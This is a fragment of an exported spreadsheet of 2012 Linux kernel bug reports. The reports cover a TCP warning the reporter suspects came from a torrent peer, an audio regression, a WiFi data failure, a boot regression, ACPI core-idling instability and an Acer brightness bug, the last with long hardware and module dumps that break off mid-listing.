[&lt;f89713e7&gt;] ? fcoe_ctlr_timer_work+0x3e7/0xb60 [libfcoe] [&lt;c13a10c4&gt;] rtnl_lock+0x14/0x20 [&lt;f89445ac&gt;] fcoe_update_src_mac+0x2c/0xb0 [fcoe] [&lt;f8971712&gt;] fcoe_ctlr_timer_work+0x712/0xb60 [libfcoe] [&lt;c106a2c5&gt;] ? local_clock+0x65/0x70 [&lt;c104faf5&gt;] ? process_one_work+0x105/0x5d0 [&lt;c10928e4&gt;] ? trace_hardirqs_on_caller+0xf4/0x180 [&lt;c104fb69&gt;] process_one_work+0x179/0x5d0 [&lt;c104faf5&gt;] ? process_one_work+0x105/0x5d0 [&lt;f8971000&gt;] ? fcoe_ctlr_vn_send_claim+0x40/0x40 [libfcoe] [&lt;c10502f1&gt;] worker_thread+0x121/0x2d0 [&lt;c10501d0&gt;] ? rescuer_thread+0x1d0/0x1d0 [&lt;c10550ed&gt;] kthread+0x7d/0x90 [&lt;c1055070&gt;] ? __init_kthread_worker+0x60/0x60 [&lt;c1481a82&gt;] kernel_thread_helper+0x6/0x10 host3: Assigned Port ID 0092b5</t>
  </si>
  <si>
    <t>Kernel trap probably by malicious packet from torrent peer</t>
  </si>
  <si>
    <t>3.0.23</t>
  </si>
  <si>
    <t>2012-03-18 19:28 UTC</t>
  </si>
  <si>
    <t>2012-05-12 16:34 UTC</t>
  </si>
  <si>
    <t>Hi, Last day I got 2 traps on otherwise (months of 24/7 uptime) stable server. I see correlation with launching torrent download (transmission client). Sys is 64-bit ArchLinux with 3.0.23 kernel. Log from trap is below. I submit this in IPv4 - but I'll appreciate if somebody will deduce from trap log proper category/kernel component involved/responsible this issue. ------------[ cut here ]------------ Mar 17 19:32:47 [98071.093459] WARNING: at net/ipv4/tcp_input.c:2999 tcp_ack+0x1e34/0x2080() Mar 17 19:32:47 [98071.093461] Hardware name: GA-880GA-UD3H Mar 17 19:32:47 [98071.093462] Modules linked in: md5 dvbloopback nfsd exportfs nfs nfs_acl lockd auth_rpcgss fscache sunrpc xt_multiport xt_recent xt_state xt_tcpudp dvb_pll cx22702 stb6100 stv090x cx88_dvb videobuf_dvb cx88_vp3054_i2c dvb_core iptable_mangle rc_hauppauge iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack iptable_filter ip_tables x_tables rc_tbs_nec appletalk ipx p8023 psnap p8022 llc snd_hda_codec_hdmi tuner cx8802 cx8800 cx88xx tveeprom btcx_risc videobuf_dma_sg videobuf_core v4l2_common videodev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_timer snd radeon soundcore drm_kms_helper ttm drm ir_lirc_codec lirc_dev i2c_algo_bit ir_sony_decoder ir_jvc_decoder ir_rc6_decoder i2c_piix4 shpchp wmi pci_hotplug i2c_core ftdi_sio usbserial edac_mce_amd v4l2_compat_ioctl32 ir_rc5_decoder media ir_nec_decoder rc_core sp5100_tco edac_core processor e1000e button r8169 mii pcspkr evdev k10temp loop it87 hwmon_vid ipv6 autofs4 ext3 mbcache jbd sd_mod pata_jmi Mar 17 19:32:47 cron pata_acpi ata_generic ahci libahci libata scsi_mod ohci_hcd ehci_hcd xhci_hcd usbcore Mar 17 19:32:47 [98071.093507] Pid: 0, comm: kworker/0:0 Tainted: G W 3.0-ARCH #1 Mar 17 19:32:47 [98071.093508] Call Trace: Mar 17 19:32:47 [98071.093509] &lt;IRQ&gt; [&lt;ffffffff8105c8ff&gt;] warn_slowpath_common+0x7f/0xc0 Mar 17 19:32:47 [98071.093514] [&lt;ffffffff8105c95a&gt;] warn_slowpath_null+0x1a/0x20 Mar 17 19:32:47 [98071.093517] [&lt;ffffffff81380c74&gt;] tcp_ack+0x1e34/0x2080 Mar 17 19:32:47 [98071.093520] [&lt;ffffffffa026a1b7&gt;] ? ipt_do_table+0x227/0x5b0 [ip_tables] Mar 17 19:32:47 [98071.093523] [&lt;ffffffff81381d50&gt;] tcp_rcv_established+0x280/0x830 Mar 17 19:32:47 [98071.093525] [&lt;ffffffff81388d6f&gt;] tcp_v4_do_rcv+0x10f/0x310 Mar 17 19:32:47 [98071.093544] [&lt;ffffffff81348545&gt;] ? sk_filter+0x95/0xd0 Mar 17 19:32:47 [98071.093546] [&lt;ffffffff8138ae14&gt;] tcp_v4_rcv+0x624/0x910 Mar 17 19:32:47 [98071.093549] [&lt;ffffffff8136804d&gt;] ip_local_deliver_finish+0xed/0x2b0 Mar 17 19:32:47 [98071.093551] [&lt;ffffffff813683e0&gt;] ip_local_deliver+0x90/0xa0 Mar 17 19:32:47 [98071.093553] [&lt;ffffffff81367d21&gt;] ip_rcv_finish+0x131/0x370 Mar 17 19:32:47 [98071.093556] [&lt;ffffffff81368615&gt;] ip_rcv+0x225/0x2f0 Mar 17 19:32:47 [98071.093559] [&lt;ffffffff81334c1a&gt;] __netif_receive_skb+0x30a/0x660 Mar 17 19:32:47 [98071.093561] [&lt;ffffffff8133574d&gt;] netif_receive_skb+0xad/0xc0 Mar 17 19:32:47 [98071.093564] [&lt;ffffffff81336140&gt;] napi_skb_finish+0x50/0x70 Mar 17 19:32:47 [98071.093567] [&lt;ffffffff81336255&gt;] napi_gro_receive+0xf5/0x140 Mar 17 19:32:47 [98071.093572] [&lt;ffffffffa01c6dbb&gt;] e1000_receive_skb+0x5b/0x70 [e1000e] Mar 17 19:32:47 [98071.093578] [&lt;ffffffffa01c8702&gt;] e1000_clean_rx_irq+0x2c2/0x430 [e1000e] Mar 17 19:32:47 [98071.093581] [&lt;ffffffff8108404f&gt;] ? hrtimer_interrupt+0x12f/0x210 Mar 17 19:32:47 [98071.093586] [&lt;ffffffffa01c811f&gt;] e1000_clean+0xaf/0x2b0 [e1000e] Mar 17 19:32:47 [98071.093589] [&lt;ffffffff81335a29&gt;] net_rx_action+0x149/0x300 Mar 17 19:32:47 [98071.093592] [&lt;ffffffff81063f90&gt;] __do_softirq+0xb0/0x270 Mar 17 19:32:47 [98071.093594] [&lt;ffffffff813f875c&gt;] call_softirq+0x1c/0x30 Mar 17 19:32:47 [98071.093596] [&lt;ffffffff8100db25&gt;] do_softirq+0x65/0xa0 Mar 17 19:32:47 [98071.093598] [&lt;ffffffff8106449e&gt;] irq_exit+0x9e/0xc0 Mar 17 19:32:47 [98071.093600] [&lt;ffffffff813f8fb3&gt;] do_IRQ+0x63/0xe0 Mar 17 19:32:47 [98071.093603] [&lt;ffffffff813f6c93&gt;] common_interrupt+0x13/0x13 Mar 17 19:32:47 [98071.093604] &lt;EOI&gt; [&lt;ffffffff81031e9b&gt;] ? native_safe_halt+0xb/0x10 Mar 17 19:32:47 [98071.093609] [&lt;ffffffff81014173&gt;] default_idle+0x53/0x2a0 Mar 17 19:32:47 [98071.093611] [&lt;ffffffff8101499a&gt;] amd_e400_idle+0x9a/0x120 Mar 17 19:32:47 [98071.093614] [&lt;ffffffff8100a21a&gt;] cpu_idle+0xba/0x100 Mar 17 19:32:47 [98071.093616] [&lt;ffffffff813e6169&gt;] start_secondary+0x202/0x209 Mar 17 19:32:47 [98071.093618] ---[ end trace 4fecd84b3e9e66ee ]--- Mar 17 19:32:47 [98071.274828] ------------[ cut here ]------------</t>
  </si>
  <si>
    <t>ALC269VB -- internal mic -- no input</t>
  </si>
  <si>
    <t>2012-03-21 22:20 UTC</t>
  </si>
  <si>
    <t>Oleksii Shevchuk</t>
  </si>
  <si>
    <t>2012-06-13 15:17 UTC</t>
  </si>
  <si>
    <t>After updating from 3.2.9 to 3.3.0 internal microphone produces no sound. Booting with 3.2 with ~same config fix issue. Here are my /proc/asound/card0/codec#0 from 3.3 and 3.2</t>
  </si>
  <si>
    <t>iwlwifi 7260: WiFi connected but no data transferred</t>
  </si>
  <si>
    <t>3.3.0-030300-generic</t>
  </si>
  <si>
    <t>2012-03-22 18:24 UTC</t>
  </si>
  <si>
    <t>Nicolo' Chieffo</t>
  </si>
  <si>
    <t>2014-12-01 06:00 UTC</t>
  </si>
  <si>
    <t>Created attachment 72686 [details] lspci -vvnn Wifi is enabled and connected to the correct access point. Unfortunately no data is transmitted, so even if I ping my router I don't get any answer. After disabling and enabling wifi several times I can get a good connection. I will attach a dmesg output</t>
  </si>
  <si>
    <t>Regression In 3.2.12 stable prevents various system types from booting</t>
  </si>
  <si>
    <t>3.2.12</t>
  </si>
  <si>
    <t>2012-03-22 19:23 UTC</t>
  </si>
  <si>
    <t>Joseph Salisbury</t>
  </si>
  <si>
    <t>2012-05-27 06:39 UTC</t>
  </si>
  <si>
    <t>Possible regression in v3.2.12 stable. The issue prevents systems from booting. There have been a few bugs[0] reported against the Ubuntu kernel, which was recently rebased to 3.2.12. We're in the process of bisecting now and will post an update. There are also reports that this bug exists in v3.3. https://bugs.launchpad.net/ubuntu/+source/linux/+bug/961482</t>
  </si>
  <si>
    <t>Processor Aggregator Device is not stable causing FW-OS communication to stop</t>
  </si>
  <si>
    <t>2.6.32-131.0.15.el6.x86_64 ,. 3.1.4+</t>
  </si>
  <si>
    <t>2012-03-23 17:01 UTC</t>
  </si>
  <si>
    <t>Sebastian Jarosz</t>
  </si>
  <si>
    <t>2012-07-14 14:50 UTC</t>
  </si>
  <si>
    <t>Processors' Idling, as defined in "Processor Aggregator Device" chapter of ACPI 4.0a spec, isn't stable, it doesn't handle big changes of the active cores well. Slow changes (e.g. 2 cores idled or activated every second) are OK, but drastic changes of the number of active cores cause whole FW-OS communication to stop (communication using ACPI defined interface). It happens especially when bigger number of cores (8 or more) is reactivated. Version-Release number of selected component (if applicable): I've tested it using kernel 2.6.32 and newer, e.g. 3.1.4 with the same results. Reproducible: Always Steps to Reproduce: 1. Request OS to idle 8 or more cores as described in "Processor Aggregator Device" chapter of ACPI 4.0a spec. 2. Request OS to make all cores active. 3. Repeat steps with bigger number of cores to idle if necessary. Actual Results: Cores are active again but communication with the firmware using ASL code is stopped, no _OST response from OS. power_saving processes are hanging. Expected Results: Cores are active again.</t>
  </si>
  <si>
    <t>Brightness unchangeable via keyboard or brightness applet Acer Aspire 5750-9668</t>
  </si>
  <si>
    <t>3.2.0-030200rc4-generic</t>
  </si>
  <si>
    <t>2012-03-25 20:38 UTC</t>
  </si>
  <si>
    <t>Christopher M. Penalver</t>
  </si>
  <si>
    <t>2013-02-08 18:21 UTC</t>
  </si>
  <si>
    <t>Downstream bug may be found at: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/863156 [1.] One line summary of the problem: Brightness unchangeable via keyboard or brightness applet Acer Aspire 5750-9668 [2.] Full description of the problem/report: What is expected to happen when one presses the Fn key and the Left or Right arrow, the brightness goes up or down respectively. What happens is the brightness does not change and remains at 100% no matter what. [3.] Keywords (i.e., modules, networking, kernel): kernel acpi [4.] Kernel version (from /proc/version): cat /proc/version Linux version 3.2.0-030200rc4-generic (root@gomeisa) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #201112012035 SMP Fri Dec 2 01:44:19 UTC 2011 [5.] Output of Oops.. message (if applicable) with symbolic information N/A [6.] A small shell script or example program which triggers the problem (if possible) N/A [7.] Environment lsb_release -rd Description: Ubuntu oneiric (development branch) Release: 11.10 [7.1.] Software (add the output of the ver_linux script here) N/A [7.2.] Processor information (from /proc/cpuinfo): cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.86 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 0 cpu cores : 4 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.90 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 2 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 1 cpu cores : 4 apicid : 2 initial apicid : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.91 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 3 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 1400.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 1 cpu cores : 4 apicid : 3 initial apicid : 3 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.91 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 4 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 2 cpu cores : 4 apicid : 4 initial apicid : 4 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.91 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 5 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 2 cpu cores : 4 apicid : 5 initial apicid : 5 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.91 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 6 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 3 cpu cores : 4 apicid : 6 initial apicid : 6 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.92 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 7 vendor_id : GenuineIntel cpu family : 6 model : 42 model name : Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz stepping : 7 microcode : 0x14 cpu MHz : 800.000 cache size : 6144 KB physical id : 0 siblings : 8 core id : 3 cpu cores : 4 apicid : 7 initial apicid : 7 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts dts tpr_shadow vnmi flexpriority ept vpid bogomips : 3990.92 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: [7.3.] Module information (from /proc/modules): cat /proc/modules rfcomm 37611 0 - Live 0x00000000 bnep 17749 2 - Live 0x00000000 bluetooth 153156 10 rfcomm,bnep, Live 0x00000000 joydev 17313 0 - Live 0x00000000 parport_pc 32006 0 - Live 0x00000000 ppdev 12900 0 - Live 0x00000000 snd_hda_codec_hdmi 31547 1 - Live 0x00000000 snd_hda_codec_realtek 173304 1 - Live 0x00000000 binfmt_misc 17258 1 - Live 0x00000000 snd_hda_intel 32396 3 - Live 0x00000000 snd_hda_codec 99529 3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel, Live 0x00000000 snd_hwdep 13272 1 snd_hda_codec, Live 0x00000000 uvcvideo 66495 0 - Live 0x00000000 videodev 86260 1 uvcvideo, Live 0x00000000 snd_pcm 76379 3 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec, Live 0x00000000 snd_seq_midi 13132 0 - Live 0x00000000 snd_rawmidi 25103 1 snd_seq_midi, Live 0x00000000 arc4 12473 2 - Live 0x00000000 snd_seq_midi_event 14475 1 snd_seq_midi, Live 0x00000000 ath9k 120313 0 - Live 0x00000000 mac80211 425736 1 ath9k, Live 0x00000000 snd_seq 51256 2 snd_seq_midi,snd_seq_midi_event, Live 0x00000000 ath9k_common 13785 1 ath9k, Live 0x00000000 ath9k_hw 394286 2 ath9k,ath9k_common, Live 0x00000000 ath 19208 3 ath9k,ath9k_common,ath9k_hw, Live 0x00000000 cfg80211 169184 3 ath9k,mac80211,ath, Live 0x00000000 snd_timer 24609 2 snd_pcm,snd_seq, Live 0x00000000 snd_seq_device 14130 3 snd_seq_midi,snd_rawmidi,snd_seq, Live 0x00000000 acer_wmi 23322 0 - Live 0x00000000 sparse_keymap 13658 1 acer_wmi, Live 0x00000000 psmouse 73554 0 - Live 0x00000000 serio_raw 13027 0 - Live 0x00000000 i915 403227 2 - Live 0x00000000 snd 55724 16 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device, Live 0x00000000 soundcore 12600 1 snd, Live 0x00000000 snd_page_alloc 14036 2 snd_hda_intel,snd_pcm, Live 0x00000000 drm_kms_helper 36749 1 i915, Live 0x00000000 drm 197071 3 i915,drm_kms_helper, Live 0x00000000 mei 36087 0 - Live 0x00000000 (C) wmi 18645 1 acer_wmi, Live 0x00000000 i2c_algo_bit 13152 1 i915, Live 0x00000000 video 18792 1 i915, Live 0x00000000 coretemp 13259 0 - Live 0x00000000 lp 13349 0 - Live 0x00000000 parport 36664 3 parport_pc,ppdev,lp, Live 0x00000000 xhci_hcd 81236 0 - Live 0x00000000 ahci 21524 3 - Live 0x00000000 tg3 140230 0 - Live 0x00000000 libahci 25841 1 ahci, Live 0x00000000 sdhci_pci 18264 0 - Live 0x00000000 sdhci 27687 1 sdhci_pci, Live 0x00000000 [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) cat /proc/modules rfcomm 37611 0 - Live 0x00000000 bnep 17749 2 - Live 0x00000000 bluetooth 153156 10 rfcomm,bnep, Live 0x00000000 joydev 17313 0 - Live 0x00000000 parport_pc 32006 0 - Live 0x00000000 ppdev 12900 0 - Live 0x00000000 snd_hda_codec_hdmi 31547 1 - Live 0x00000000 snd_hda_codec_realtek 173304 1 - Live 0x00000000 binfmt_misc 17258 1 - Live 0x00000000 snd_hda_intel 32396 3 - Live 0x00000000 snd_hda_codec 99529 3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel, Live 0x00000000 snd_hwdep 13272 1 snd_hda_codec, Live 0x00000000 uvcvideo 66495 0 - Live 0x00000000 videodev 86260 1 uvcvideo, Live 0x00000000 snd_pcm 76379 3 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec, Live 0x00000000 snd_seq_midi 13132 0 - Live 0x00000000 snd_rawmidi 25103 1 snd_seq_midi, Live 0x00000000 arc4 12473 2 - Live 0x00000000 snd_seq_midi_event 14475 1 snd_seq_midi, Live 0x00000000 ath9k 120313 0 - Live 0x00000000 mac80211 425736 1 ath9k, Live 0x00000000 snd_seq 51256 2 snd_seq_midi,snd_seq_midi_event, Live 0x00000000 ath9k_common 13785 1 ath9k, Live 0x00000000 ath9k_hw 394286 2 ath9k,ath9k_common, Live 0x00000000 ath 19208 3 ath9k,ath9k_common,ath9k_hw, Live 0x00000000 cfg80211 169184 3 ath9k,mac80211,ath, Live 0x00000000 snd_timer 24609 2 snd_pcm,snd_seq, Live 0x00000000 snd_seq_device 14130 3 snd_seq_midi,snd_rawmidi,snd_seq, Live 0x00000000 acer_wmi 23322 0 - Live 0x00000000 sparse_keymap 13658 1 acer_wmi, Live 0x00000000 psmouse 73554 0 - Live 0x00000000 serio_raw 13027 0 - Live 0x00000000 i915 403227 2 - Live 0x00000000 snd 55724 16 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device, Live 0x00000000 soundcore 12600 1 snd, Live 0x00000000 snd_page_alloc 14036 2 snd_hda_intel,snd_pcm, Live 0x00000000 drm_kms_helper 36749 1 i915, Live 0x00000000 drm 197071 3 i915,drm_kms_helper, Live 0x00000000 mei 36087 0 - Live 0x00000000 (C) wmi 18645 1 acer_wmi, Live 0x00000000 i2c_algo_bit 13152 1 i915, Live 0x00000000 video 18792 1 i915, Live 0x00000000 coretemp 13259 0 - Live 0x00000000 lp 13349 0 - Live 0x00000000 parport 36664 3 parport_pc,ppdev,lp, Live 0x00000000 xhci_hcd 81236 0 - Live 0x00000000 ahci 21524 3 - Live 0x00000000 tg3 140230 0 - Live 0x00000000 libahci 25841 1 ahci, Live 0x00000000 sdhci_pci 18264 0 - Live 0x00000000 sdhci 27687 1 sdhci_pci, Live 0x00000000 monikerpc@monikerpc:~$ cat /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0062-0062 : EC data 0064-0064 : keyboard 0066-0066 : EC cmd 0070-0077 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0400-047f : pnp 00:05 0400-0403 : ACPI PM1a_EVT_BLK 0404-0405 : ACPI PM1a_CNT_BLK 0408-040b : ACPI PM_TMR 0410-0415 : ACPI CPU throttle 0420-042f : ACPI GPE0_BLK 0450-0450 : ACPI PM2_CNT_BLK 0454-0457 : pnp 00:07 0500-057f : pnp 00:05 0680-069f : pnp 00:05 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 1000-100f : pnp 00:05 164e-164f : pnp 00:05 2000-203f : 0000:00:02.0 2040-205f : 0000:00:1f.3 2060-207f : 0000:00:1f.2 2060-207f : ahci 2090-2097 : 0000:00:1f.2 2090-2097 : ahci 2098-209f : 0000:00:1f.2 2098-209f : ahci 20b8-20bb : 0000:00:1f.2 20b8-20bb : ahci 20bc-20bf : 0000:00:1f.2 20bc-20bf : ahci ff2c-ff2f : pnp 00:05 ffff-ffff : pnp 00:05 ffff-ffff : pnp 00:05 cat /proc/iomem 00000000-0000ffff : reserved 00010000-0009d7ff : System RAM 0009d800-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000a0000-000bffff : Video RAM area 000c0000-000cedff : Video ROM 000cf000-000d1dff : Adapter ROM 000e0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-a6e3efff : System RAM 01000000-0154e3ec : Kernel code 0154e3ed-017e247f : Kernel data 01899000-0196ffff : Kernel bss a6e3f000-a6ebefff : reserved a6ebf000-a6fbefff : ACPI Non-volatile Storage a6fbf000-a6ffefff : ACPI Tables a6fff000-a6ffffff : System RAM a7000000-af9fffff : reserved afa00000-feafffff : PCI Bus 0000:00 afa00000-afa00fff : pnp 00:0a afb00000-afbfffff : PCI Bus 0000:02 b0000000-bfffffff : 0000:00:02.0 c0000000-c03fffff : 0000:00:02.0 c0400000-c04fffff : PCI Bus 0000:02 c0400000-c040ffff : 0000:02:00.1 c0400000-c040ffff : mmc0 c0410000-c041ffff : 0000:02:00.2 c0420000-c042ffff : 0000:02:00.3 c0430000-c043ffff : 0000:02:00.0 c0430000-c043ffff : tg3 c0440000-c044ffff : 0000:02:00.0 c0440000-c044ffff : tg3 c0450000-c04507ff : 0000:02:00.0 c0500000-c05fffff : PCI Bus 0000:05 c0500000-c0501fff : 0000:05:00.0 c0500000-c0501fff : xhci_hcd c0600000-c06fffff : PCI Bus 0000:03 c0600000-c060ffff : 0000:03:00.0 c0600000-c060ffff : ath9k c0700000-c0703fff : 0000:00:1b.0 c0700000-c0703fff : ICH HD audio c0704000-c070400f : 0000:00:16.0 c0704000-c070400f : mei c0706000-c07060ff : 0000:00:1f.3 c0708000-c07087ff : 0000:00:1f.2 c0708000-c07087ff : ahci c0709000-c07093ff : 0000:00:1d.0 c0709000-c07093ff : ehci_hcd c070a000-c070a3ff : 0000:00:1a.0 c070a000-c070a3ff : ehci_hcd e0000000-efffffff : PCI MMCONFIG 0000 [bus 00-ff] e0000000-efffffff : reserved e0000000-efffffff : pnp 00:0a feb00000-feb03fff : reserved fec00000-fec00fff : reserved fec00000-fec003ff : IOAPIC 0 fed00000-fed003ff : HPET 0 fed10000-fed19fff : reserved fed10000-fed17fff : pnp 00:0a fed18000-fed18fff : pnp 00:0a fed19000-fed19fff : pnp 00:0a fed1c000-fed1ffff : reserved fed1c000-fed1ffff : pnp 00:0a fed20000-fed3ffff : pnp 00:0a fed90000-fed93fff : pnp 00:0a fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved ffd80000-ffffffff : reserved [7.5.] PCI information ('lspci -vvv' as root) sudo lspci -vvv 00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; 